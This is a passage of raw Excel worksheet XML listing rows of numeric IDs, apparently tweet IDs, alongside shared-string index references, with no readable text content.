        <v>1</v>
      </c>
      <c r="D5627" t="s">
        <v>13811</v>
      </c>
      <c r="E5627" t="s">
        <v>13812</v>
      </c>
    </row>
    <row r="5628" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5628">
        <v>1.23389089716033E+18</v>
      </c>
      <c r="B5628" t="s">
        <v>13813</v>
      </c>
      <c r="C5628" t="s">
        <v>1</v>
      </c>
      <c r="D5628" t="s">
        <v>13814</v>
      </c>
      <c r="E5628" t="s">
        <v>11348</v>
      </c>
    </row>
    <row r="5629" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5629">
        <v>1.2338897627942001E+18</v>
      </c>
      <c r="B5629" t="s">
        <v>13815</v>
      </c>
      <c r="C5629" t="s">
        <v>1</v>
      </c>
      <c r="D5629" t="s">
        <v>13816</v>
      </c>
      <c r="E5629" t="s">
        <v>13817</v>
      </c>
    </row>
    <row r="5630" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5630">
        <v>1.2338896870199501E+18</v>
      </c>
      <c r="B5630" t="s">
        <v>13818</v>
      </c>
      <c r="C5630" t="s">
        <v>1</v>
      </c>
      <c r="D5630" t="s">
        <v>13819</v>
      </c>
      <c r="E5630" t="s">
        <v>1236</v>
      </c>
    </row>
    <row r="5631" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5631">
        <v>1.2338892076233999E+18</v>
      </c>
      <c r="B5631" t="s">
        <v>13820</v>
      </c>
      <c r="C5631" t="s">
        <v>1</v>
      </c>
      <c r="D5631" t="s">
        <v>13821</v>
      </c>
      <c r="E5631" t="s">
        <v>13822</v>
      </c>
    </row>
    <row r="5632" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5632">
        <v>1.2338889689968799E+18</v>
      </c>
      <c r="B5632" t="s">
        <v>13823</v>
      </c>
      <c r="C5632" t="s">
        <v>1</v>
      </c>
      <c r="D5632" t="s">
        <v>13824</v>
      </c>
      <c r="E5632" t="s">
        <v>13649</v>
      </c>
    </row>
    <row r="5633" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5633">
        <v>1.23388628511218E+18</v>
      </c>
      <c r="B5633" t="s">
        <v>13825</v>
      </c>
      <c r="C5633" t="s">
        <v>1</v>
      </c>
      <c r="D5633" t="s">
        <v>13826</v>
      </c>
      <c r="E5633" t="s">
        <v>1262</v>
      </c>
    </row>
    <row r="5634" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5634">
        <v>1.2338844022261601E+18</v>
      </c>
      <c r="B5634" t="s">
        <v>13827</v>
      </c>
      <c r="C5634" t="s">
        <v>1</v>
      </c>
      <c r="D5634" t="s">
        <v>13828</v>
      </c>
      <c r="E5634" t="s">
        <v>13829</v>
      </c>
    </row>
    <row r="5635" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5635">
        <v>1.2338817234458701E+18</v>
      </c>
      <c r="B5635" t="s">
        <v>13830</v>
      </c>
      <c r="C5635" t="s">
        <v>1</v>
      </c>
      <c r="D5635" t="s">
        <v>13831</v>
      </c>
      <c r="E5635" t="s">
        <v>6299</v>
      </c>
    </row>
    <row r="5636" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5636">
        <v>1.23387931338621E+18</v>
      </c>
      <c r="B5636" t="s">
        <v>13832</v>
      </c>
      <c r="C5636" t="s">
        <v>1</v>
      </c>
      <c r="D5636" t="s">
        <v>13833</v>
      </c>
      <c r="E5636" t="s">
        <v>10124</v>
      </c>
    </row>
    <row r="5637" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5637">
        <v>1.23387872128051E+18</v>
      </c>
      <c r="B5637" t="s">
        <v>13834</v>
      </c>
      <c r="C5637" t="s">
        <v>1</v>
      </c>
      <c r="D5637" t="s">
        <v>13835</v>
      </c>
      <c r="E5637" t="s">
        <v>13836</v>
      </c>
    </row>
    <row r="5638" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5638">
        <v>1.2338768625789399E+18</v>
      </c>
      <c r="B5638" t="s">
        <v>13837</v>
      </c>
      <c r="C5638" t="s">
        <v>1</v>
      </c>
      <c r="D5638" t="s">
        <v>13838</v>
      </c>
      <c r="E5638" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="5639" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5639">
        <v>1.2338747905676101E+18</v>
      </c>
      <c r="B5639" t="s">
        <v>13839</v>
      </c>
      <c r="C5639" t="s">
        <v>1</v>
      </c>
      <c r="D5639" t="s">
        <v>1503</v>
      </c>
      <c r="E5639" t="s">
        <v>1504</v>
      </c>
    </row>
    <row r="5640" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5640">
        <v>1.2338747880048799E+18</v>
      </c>
      <c r="B5640" t="s">
        <v>13840</v>
      </c>
      <c r="C5640" t="s">
        <v>1</v>
      </c>
      <c r="D5640" t="s">
        <v>13841</v>
      </c>
      <c r="E5640" t="s">
        <v>13842</v>
      </c>
    </row>
    <row r="5641" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5641">
        <v>1.2338747225863401E+18</v>
      </c>
      <c r="B5641" t="s">
        <v>13843</v>
      </c>
      <c r="C5641" t="s">
        <v>1</v>
      </c>
      <c r="D5641" t="s">
        <v>13844</v>
      </c>
      <c r="E5641" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5642" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5642">
        <v>1.2338747190840699E+18</v>
      </c>
      <c r="B5642" t="s">
        <v>13845</v>
      </c>
      <c r="C5642" t="s">
        <v>1</v>
      </c>
      <c r="D5642" t="s">
        <v>13846</v>
      </c>
      <c r="E5642" t="s">
        <v>13847</v>
      </c>
    </row>
    <row r="5643" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5643">
        <v>1.23387298084287E+18</v>
      </c>
      <c r="B5643" t="s">
        <v>13848</v>
      </c>
      <c r="C5643" t="s">
        <v>1</v>
      </c>
      <c r="D5643" t="s">
        <v>13849</v>
      </c>
      <c r="E5643" t="s">
        <v>13850</v>
      </c>
    </row>
    <row r="5644" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5644">
        <v>1.23387234247393E+18</v>
      </c>
      <c r="B5644" t="s">
        <v>13851</v>
      </c>
      <c r="C5644" t="s">
        <v>1</v>
      </c>
      <c r="D5644" t="s">
        <v>13852</v>
      </c>
      <c r="E5644" t="s">
        <v>5470</v>
      </c>
    </row>
    <row r="5645" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5645">
        <v>1.23387029613169E+18</v>
      </c>
      <c r="B5645" t="s">
        <v>13853</v>
      </c>
      <c r="C5645" t="s">
        <v>1</v>
      </c>
      <c r="D5645" t="s">
        <v>13229</v>
      </c>
      <c r="E5645" t="s">
        <v>13230</v>
      </c>
    </row>
    <row r="5646" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5646">
        <v>1.23386973203981E+18</v>
      </c>
      <c r="B5646" t="s">
        <v>13854</v>
      </c>
      <c r="C5646" t="s">
        <v>1</v>
      </c>
      <c r="D5646" t="s">
        <v>13855</v>
      </c>
      <c r="E5646" t="s">
        <v>13856</v>
      </c>
    </row>
    <row r="5647" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5647">
        <v>1.23386778018687E+18</v>
      </c>
      <c r="B5647" t="s">
        <v>13857</v>
      </c>
      <c r="C5647" t="s">
        <v>1</v>
      </c>
      <c r="D5647" t="s">
        <v>13858</v>
      </c>
      <c r="E5647" t="s">
        <v>9868</v>
      </c>
    </row>
    <row r="5648" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5648">
        <v>1.23386767786688E+18</v>
      </c>
      <c r="B5648" t="s">
        <v>13859</v>
      </c>
      <c r="C5648" t="s">
        <v>1</v>
      </c>
      <c r="D5648" t="s">
        <v>13860</v>
      </c>
      <c r="E5648" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5649" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5649">
        <v>1.23386745145837E+18</v>
      </c>
      <c r="B5649" t="s">
        <v>13861</v>
      </c>
      <c r="C5649" t="s">
        <v>1</v>
      </c>
      <c r="D5649" t="s">
        <v>13862</v>
      </c>
      <c r="E5649" t="s">
        <v>13863</v>
      </c>
    </row>
    <row r="5650" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5650">
        <v>1.2338661514631301E+18</v>
      </c>
      <c r="B5650" t="s">
        <v>13864</v>
      </c>
      <c r="C5650" t="s">
        <v>1</v>
      </c>
      <c r="D5650" t="s">
        <v>13865</v>
      </c>
      <c r="E5650" t="s">
        <v>13866</v>
      </c>
    </row>
    <row r="5651" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5651">
        <v>1.23386607971117E+18</v>
      </c>
      <c r="B5651" t="s">
        <v>13867</v>
      </c>
      <c r="C5651" t="s">
        <v>1</v>
      </c>
      <c r="D5651" t="s">
        <v>13868</v>
      </c>
      <c r="E5651" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="5652" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5652">
        <v>1.2338660612437199E+18</v>
      </c>
      <c r="B5652" t="s">
        <v>13869</v>
      </c>
      <c r="C5652" t="s">
        <v>1</v>
      </c>
      <c r="D5652" t="s">
        <v>13870</v>
      </c>
      <c r="E5652" t="s">
        <v>13417</v>
      </c>
    </row>
    <row r="5653" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5653">
        <v>1.23386516572621E+18</v>
      </c>
      <c r="B5653" t="s">
        <v>13871</v>
      </c>
      <c r="C5653" t="s">
        <v>1</v>
      </c>
      <c r="D5653" t="s">
        <v>13872</v>
      </c>
      <c r="E5653" t="s">
        <v>13873</v>
      </c>
    </row>
    <row r="5654" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5654">
        <v>1.2338649595383601E+18</v>
      </c>
      <c r="B5654" t="s">
        <v>13874</v>
      </c>
      <c r="C5654" t="s">
        <v>1</v>
      </c>
      <c r="D5654" t="s">
        <v>13875</v>
      </c>
      <c r="E5654" t="s">
        <v>13876</v>
      </c>
    </row>
    <row r="5655" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5655">
        <v>1.2338640590968801E+18</v>
      </c>
      <c r="B5655" t="s">
        <v>13877</v>
      </c>
      <c r="C5655" t="s">
        <v>1</v>
      </c>
      <c r="D5655" t="s">
        <v>13878</v>
      </c>
      <c r="E5655" t="s">
        <v>13879</v>
      </c>
    </row>
    <row r="5656" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5656">
        <v>1.2338634060101601E+18</v>
      </c>
      <c r="B5656" t="s">
        <v>13880</v>
      </c>
      <c r="C5656" t="s">
        <v>1</v>
      </c>
      <c r="D5656" t="s">
        <v>13881</v>
      </c>
      <c r="E5656" t="s">
        <v>13882</v>
      </c>
    </row>
    <row r="5657" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5657">
        <v>1.23386282748559E+18</v>
      </c>
      <c r="B5657" t="s">
        <v>13883</v>
      </c>
      <c r="C5657" t="s">
        <v>1</v>
      </c>
      <c r="D5657" t="s">
        <v>13884</v>
      </c>
      <c r="E5657" t="s">
        <v>4190</v>
      </c>
    </row>
    <row r="5658" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5658">
        <v>1.2338626612695301E+18</v>
      </c>
      <c r="B5658" t="s">
        <v>13885</v>
      </c>
      <c r="C5658" t="s">
        <v>1</v>
      </c>
      <c r="D5658" t="s">
        <v>13886</v>
      </c>
      <c r="E5658" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="5659" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5659">
        <v>1.2338622929257101E+18</v>
      </c>
      <c r="B5659" t="s">
        <v>13887</v>
      </c>
      <c r="C5659" t="s">
        <v>1</v>
      </c>
      <c r="D5659" t="s">
        <v>13888</v>
      </c>
      <c r="E5659" t="s">
        <v>13889</v>
      </c>
    </row>
    <row r="5660" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5660">
        <v>1.2338596874826701E+18</v>
      </c>
      <c r="B5660" t="s">
        <v>13890</v>
      </c>
      <c r="C5660" t="s">
        <v>1</v>
      </c>
      <c r="D5660" t="s">
        <v>13891</v>
      </c>
      <c r="E5660" t="s">
        <v>4814</v>
      </c>
    </row>
    <row r="5661" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5661">
        <v>1.2338595648958999E+18</v>
      </c>
      <c r="B5661" t="s">
        <v>13892</v>
      </c>
      <c r="C5661" t="s">
        <v>1</v>
      </c>
      <c r="D5661" t="s">
        <v>13893</v>
      </c>
      <c r="E5661" t="s">
        <v>2071</v>
      </c>
    </row>
    <row r="5662" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5662">
        <v>1.2338554798997E+18</v>
      </c>
      <c r="B5662" t="s">
        <v>13894</v>
      </c>
      <c r="C5662" t="s">
        <v>1</v>
      </c>
      <c r="D5662" t="s">
        <v>13895</v>
      </c>
      <c r="E5662" t="s">
        <v>2096</v>
      </c>
    </row>
    <row r="5663" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5663">
        <v>1.23385512249039E+18</v>
      </c>
      <c r="B5663" t="s">
        <v>13896</v>
      </c>
      <c r="C5663" t="s">
        <v>1</v>
      </c>
      <c r="D5663" t="s">
        <v>13897</v>
      </c>
      <c r="E5663" t="s">
        <v>13898</v>
      </c>
    </row>
    <row r="5664" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5664">
        <v>1.2338520045035699E+18</v>
      </c>
      <c r="B5664" t="s">
        <v>13899</v>
      </c>
      <c r="C5664" t="s">
        <v>1</v>
      </c>
      <c r="D5664" t="s">
        <v>13900</v>
      </c>
      <c r="E5664" t="s">
        <v>1076</v>
      </c>
    </row>
    <row r="5665" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5665">
        <v>1.2338518367104901E+18</v>
      </c>
      <c r="B5665" t="s">
        <v>13901</v>
      </c>
      <c r="C5665" t="s">
        <v>1</v>
      </c>
      <c r="D5665" t="s">
        <v>13902</v>
      </c>
      <c r="E5665" t="s">
        <v>13903</v>
      </c>
    </row>
    <row r="5666" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5666">
        <v>1.23385150433281E+18</v>
      </c>
      <c r="B5666" t="s">
        <v>13904</v>
      </c>
      <c r="C5666" t="s">
        <v>1</v>
      </c>
      <c r="D5666" t="s">
        <v>13905</v>
      </c>
      <c r="E5666" t="s">
        <v>13906</v>
      </c>
    </row>
    <row r="5667" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5667">
        <v>1.2338511143085299E+18</v>
      </c>
      <c r="B5667" t="s">
        <v>13907</v>
      </c>
      <c r="C5667" t="s">
        <v>1</v>
      </c>
      <c r="D5667" t="s">
        <v>13908</v>
      </c>
      <c r="E5667" t="s">
        <v>2516</v>
      </c>
    </row>
    <row r="5668" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5668">
        <v>1.2338507935199099E+18</v>
      </c>
      <c r="B5668" t="s">
        <v>13909</v>
      </c>
      <c r="C5668" t="s">
        <v>1</v>
      </c>
      <c r="D5668" t="s">
        <v>13910</v>
      </c>
      <c r="E5668" t="s">
        <v>8524</v>
      </c>
    </row>
    <row r="5669" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5669">
        <v>1.23384820140225E+18</v>
      </c>
      <c r="B5669" t="s">
        <v>13911</v>
      </c>
      <c r="C5669" t="s">
        <v>1</v>
      </c>
      <c r="D5669" t="s">
        <v>13912</v>
      </c>
      <c r="E5669" t="s">
        <v>12951</v>
      </c>
    </row>
    <row r="5670" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5670">
        <v>1.2338459057255099E+18</v>
      </c>
      <c r="B5670" t="s">
        <v>13913</v>
      </c>
      <c r="C5670" t="s">
        <v>1</v>
      </c>
      <c r="D5670" t="s">
        <v>13914</v>
      </c>
      <c r="E5670" t="s">
        <v>1105</v>
      </c>
    </row>
    <row r="5671" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5671">
        <v>1.2338455569565299E+18</v>
      </c>
      <c r="B5671" t="s">
        <v>13915</v>
      </c>
      <c r="C5671" t="s">
        <v>1</v>
      </c>
      <c r="D5671" t="s">
        <v>13916</v>
      </c>
      <c r="E5671" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5672" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5672">
        <v>1.2338454025432499E+18</v>
      </c>
      <c r="B5672" t="s">
        <v>13917</v>
      </c>
      <c r="C5672" t="s">
        <v>1</v>
      </c>
      <c r="D5672" t="s">
        <v>13918</v>
      </c>
      <c r="E5672" t="s">
        <v>5662</v>
      </c>
    </row>
    <row r="5673" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5673">
        <v>1.2338446513770199E+18</v>
      </c>
      <c r="B5673" t="s">
        <v>13919</v>
      </c>
      <c r="C5673" t="s">
        <v>1</v>
      </c>
      <c r="D5673" t="s">
        <v>13920</v>
      </c>
      <c r="E5673" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5674" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5674">
        <v>1.2338446493259699E+18</v>
      </c>
      <c r="B5674" t="s">
        <v>13921</v>
      </c>
      <c r="C5674" t="s">
        <v>1</v>
      </c>
      <c r="D5674" t="s">
        <v>13922</v>
      </c>
      <c r="E5674" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5675" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5675">
        <v>1.23384446970913E+18</v>
      </c>
      <c r="B5675" t="s">
        <v>13923</v>
      </c>
      <c r="C5675" t="s">
        <v>1</v>
      </c>
      <c r="D5675" t="s">
        <v>13924</v>
      </c>
      <c r="E5675" t="s">
        <v>12103</v>
      </c>
    </row>
    <row r="5676" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5676">
        <v>1.2338444152167199E+18</v>
      </c>
      <c r="B5676" t="s">
        <v>13925</v>
      </c>
      <c r="C5676" t="s">
        <v>1</v>
      </c>
      <c r="D5676" t="s">
        <v>13926</v>
      </c>
      <c r="E5676" t="s">
        <v>1645</v>
      </c>
    </row>
    <row r="5677" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5677">
        <v>1.23384216670066E+18</v>
      </c>
      <c r="B5677" t="s">
        <v>13927</v>
      </c>
      <c r="C5677" t="s">
        <v>1</v>
      </c>
      <c r="D5677" t="s">
        <v>13928</v>
      </c>
      <c r="E5677" t="s">
        <v>1659</v>
      </c>
    </row>
    <row r="5678" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5678">
        <v>1.23384146913759E+18</v>
      </c>
      <c r="B5678" t="s">
        <v>13929</v>
      </c>
      <c r="C5678" t="s">
        <v>1</v>
      </c>
      <c r="D5678" t="s">
        <v>13930</v>
      </c>
      <c r="E5678" t="s">
        <v>1024</v>
      </c>
    </row>
    <row r="5679" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5679">
        <v>1.2338410726793201E+18</v>
      </c>
      <c r="B5679" t="s">
        <v>13931</v>
      </c>
      <c r="C5679" t="s">
        <v>1</v>
      </c>
      <c r="D5679" t="s">
        <v>13932</v>
      </c>
      <c r="E5679" t="s">
        <v>13933</v>
      </c>
    </row>
    <row r="5680" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5680">
        <v>1.23384098515678E+18</v>
      </c>
      <c r="B5680" t="s">
        <v>13934</v>
      </c>
      <c r="C5680" t="s">
        <v>1</v>
      </c>
      <c r="D5680" t="s">
        <v>7616</v>
      </c>
      <c r="E5680" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="5681" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5681">
        <v>1.2338407190700101E+18</v>
      </c>
      <c r="B5681" t="s">
        <v>13935</v>
      </c>
      <c r="C5681" t="s">
        <v>1</v>
      </c>
      <c r="D5681" t="s">
        <v>13936</v>
      </c>
      <c r="E5681" t="s">
        <v>13937</v>
      </c>
    </row>
    <row r="5682" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5682">
        <v>1.2338393350001999E+18</v>
      </c>
      <c r="B5682" t="s">
        <v>13938</v>
      </c>
      <c r="C5682" t="s">
        <v>1</v>
      </c>
      <c r="D5682" t="s">
        <v>13939</v>
      </c>
      <c r="E5682" t="s">
        <v>13940</v>
      </c>
    </row>
    <row r="5683" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5683">
        <v>1.2338392161168599E+18</v>
      </c>
      <c r="B5683" t="s">
        <v>13941</v>
      </c>
      <c r="C5683" t="s">
        <v>1</v>
      </c>
      <c r="D5683" t="s">
        <v>13942</v>
      </c>
      <c r="E5683" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="5684" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5684">
        <v>1.23383801060259E+18</v>
      </c>
      <c r="B5684" t="s">
        <v>13943</v>
      </c>
      <c r="C5684" t="s">
        <v>1</v>
      </c>
      <c r="D5684" t="s">
        <v>13944</v>
      </c>
      <c r="E5684" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5685" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5685">
        <v>1.23383796950258E+18</v>
      </c>
      <c r="B5685" t="s">
        <v>13945</v>
      </c>
      <c r="C5685" t="s">
        <v>1</v>
      </c>
      <c r="D5685" t="s">
        <v>13946</v>
      </c>
      <c r="E5685" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="5686" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5686">
        <v>1.2338368371536599E+18</v>
      </c>
      <c r="B5686" t="s">
        <v>13947</v>
      </c>
      <c r="C5686" t="s">
        <v>1</v>
      </c>
      <c r="D5686" t="s">
        <v>13948</v>
      </c>
      <c r="E5686" t="s">
        <v>13536</v>
      </c>
    </row>
    <row r="5687" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5687">
        <v>1.2338365737724301E+18</v>
      </c>
      <c r="B5687" t="s">
        <v>13949</v>
      </c>
      <c r="C5687" t="s">
        <v>1</v>
      </c>
      <c r="D5687" t="s">
        <v>13950</v>
      </c>
      <c r="E5687" t="s">
        <v>2238</v>
      </c>
    </row>
    <row r="5688" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5688">
        <v>1.2338349511555699E+18</v>
      </c>
      <c r="B5688" t="s">
        <v>13951</v>
      </c>
      <c r="C5688" t="s">
        <v>1</v>
      </c>
      <c r="D5688" t="s">
        <v>13952</v>
      </c>
      <c r="E5688" t="s">
        <v>13953</v>
      </c>
    </row>
    <row r="5689" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5689">
        <v>1.23383407185328E+18</v>
      </c>
      <c r="B5689" t="s">
        <v>13954</v>
      </c>
      <c r="C5689" t="s">
        <v>1</v>
      </c>
      <c r="D5689" t="s">
        <v>13382</v>
      </c>
      <c r="E5689" t="s">
        <v>1740</v>
      </c>
    </row>
    <row r="5690" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5690">
        <v>1.23383406644269E+18</v>
      </c>
      <c r="B5690" t="s">
        <v>13955</v>
      </c>
      <c r="C5690" t="s">
        <v>1</v>
      </c>
      <c r="D5690" t="s">
        <v>13671</v>
      </c>
      <c r="E5690" t="s">
        <v>1740</v>
      </c>
    </row>
    <row r="5691" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5691">
        <v>1.23383376319871E+18</v>
      </c>
      <c r="B5691" t="s">
        <v>13956</v>
      </c>
      <c r="C5691" t="s">
        <v>1</v>
      </c>
      <c r="D5691" t="s">
        <v>13957</v>
      </c>
      <c r="E5691" t="s">
        <v>13958</v>
      </c>
    </row>
    <row r="5692" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5692">
        <v>1.2338333531929101E+18</v>
      </c>
      <c r="B5692" t="s">
        <v>13959</v>
      </c>
      <c r="C5692" t="s">
        <v>1</v>
      </c>
      <c r="D5692" t="s">
        <v>13960</v>
      </c>
      <c r="E5692" t="s">
        <v>13961</v>
      </c>
    </row>
    <row r="5693" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5693">
        <v>1.23383246054434E+18</v>
      </c>
      <c r="B5693" t="s">
        <v>13962</v>
      </c>
      <c r="C5693" t="s">
        <v>1</v>
      </c>
      <c r="D5693" t="s">
        <v>13963</v>
      </c>
      <c r="E5693" t="s">
        <v>13964</v>
      </c>
    </row>
    <row r="5694" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5694">
        <v>1.23383229361503E+18</v>
      </c>
      <c r="B5694" t="s">
        <v>13965</v>
      </c>
      <c r="C5694" t="s">
        <v>1</v>
      </c>
      <c r="D5694" t="s">
        <v>13966</v>
      </c>
      <c r="E5694" t="s">
        <v>13967</v>
      </c>
    </row>
    <row r="5695" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5695">
        <v>1.2338316324501399E+18</v>
      </c>
      <c r="B5695" t="s">
        <v>13968</v>
      </c>
      <c r="C5695" t="s">
        <v>1</v>
      </c>
      <c r="D5695" t="s">
        <v>13969</v>
      </c>
      <c r="E5695" t="s">
        <v>13970</v>
      </c>
    </row>
    <row r="5696" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5696">
        <v>1.23383081747602E+18</v>
      </c>
      <c r="B5696" t="s">
        <v>13971</v>
      </c>
      <c r="C5696" t="s">
        <v>1</v>
      </c>
      <c r="D5696" t="s">
        <v>13972</v>
      </c>
      <c r="E5696" t="s">
        <v>13973</v>
      </c>
    </row>
    <row r="5697" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5697">
        <v>1.23383081534958E+18</v>
      </c>
      <c r="B5697" t="s">
        <v>13974</v>
      </c>
      <c r="C5697" t="s">
        <v>1</v>
      </c>
      <c r="D5697" t="s">
        <v>13975</v>
      </c>
      <c r="E5697" t="s">
        <v>13976</v>
      </c>
    </row>
    <row r="5698" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5698">
        <v>1.2338294788637599E+18</v>
      </c>
      <c r="B5698" t="s">
        <v>13977</v>
      </c>
      <c r="C5698" t="s">
        <v>1</v>
      </c>
      <c r="D5698" t="s">
        <v>13978</v>
      </c>
      <c r="E5698" t="s">
        <v>4223</v>
      </c>
    </row>
    <row r="5699" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5699">
        <v>1.23382941615486E+18</v>
      </c>
      <c r="B5699" t="s">
        <v>13979</v>
      </c>
      <c r="C5699" t="s">
        <v>1</v>
      </c>
      <c r="D5699" t="s">
        <v>13980</v>
      </c>
      <c r="E5699" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5700" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5700">
        <v>1.2338279174629801E+18</v>
      </c>
      <c r="B5700" t="s">
        <v>13981</v>
      </c>
      <c r="C5700" t="s">
        <v>1</v>
      </c>
      <c r="D5700" t="s">
        <v>13982</v>
      </c>
      <c r="E5700" t="s">
        <v>13983</v>
      </c>
    </row>
    <row r="5701" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5701">
        <v>1.2338275298212301E+18</v>
      </c>
      <c r="B5701" t="s">
        <v>13984</v>
      </c>
      <c r="C5701" t="s">
        <v>1</v>
      </c>
      <c r="D5701" t="s">
        <v>13985</v>
      </c>
      <c r="E5701" t="s">
        <v>1757</v>
      </c>
    </row>
    <row r="5702" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5702">
        <v>1.2338274144399099E+18</v>
      </c>
      <c r="B5702" t="s">
        <v>13986</v>
      </c>
      <c r="C5702" t="s">
        <v>1</v>
      </c>
      <c r="D5702" t="s">
        <v>13987</v>
      </c>
      <c r="E5702" t="s">
        <v>2343</v>
      </c>
    </row>
    <row r="5703" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5703">
        <v>1.23382694021937E+18</v>
      </c>
      <c r="B5703" t="s">
        <v>13988</v>
      </c>
      <c r="C5703" t="s">
        <v>1</v>
      </c>
      <c r="D5703" t="s">
        <v>13989</v>
      </c>
      <c r="E5703" t="s">
        <v>13990</v>
      </c>
    </row>
    <row r="5704" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5704">
        <v>1.23382607331554E+18</v>
      </c>
      <c r="B5704" t="s">
        <v>13991</v>
      </c>
      <c r="C5704" t="s">
        <v>1</v>
      </c>
      <c r="D5704" t="s">
        <v>13992</v>
      </c>
      <c r="E5704" t="s">
        <v>13993</v>
      </c>
    </row>
    <row r="5705" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5705">
        <v>1.2338253991985001E+18</v>
      </c>
      <c r="B5705" t="s">
        <v>13994</v>
      </c>
      <c r="C5705" t="s">
        <v>1</v>
      </c>
      <c r="D5705" t="s">
        <v>13995</v>
      </c>
      <c r="E5705" t="s">
        <v>13996</v>
      </c>
    </row>
    <row r="5706" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5706">
        <v>1.23382435676304E+18</v>
      </c>
      <c r="B5706" t="s">
        <v>13997</v>
      </c>
      <c r="C5706" t="s">
        <v>1</v>
      </c>
      <c r="D5706" t="s">
        <v>13998</v>
      </c>
      <c r="E5706" t="s">
        <v>13999</v>
      </c>
    </row>
    <row r="5707" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5707">
        <v>1.23382326090895E+18</v>
      </c>
      <c r="B5707" t="s">
        <v>14000</v>
      </c>
      <c r="C5707" t="s">
        <v>1</v>
      </c>
      <c r="D5707" t="s">
        <v>14001</v>
      </c>
      <c r="E5707" t="s">
        <v>14002</v>
      </c>
    </row>
    <row r="5708" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5708">
        <v>1.23382263599535E+18</v>
      </c>
      <c r="B5708" t="s">
        <v>14003</v>
      </c>
      <c r="C5708" t="s">
        <v>1</v>
      </c>
      <c r="D5708" t="s">
        <v>14004</v>
      </c>
      <c r="E5708" t="s">
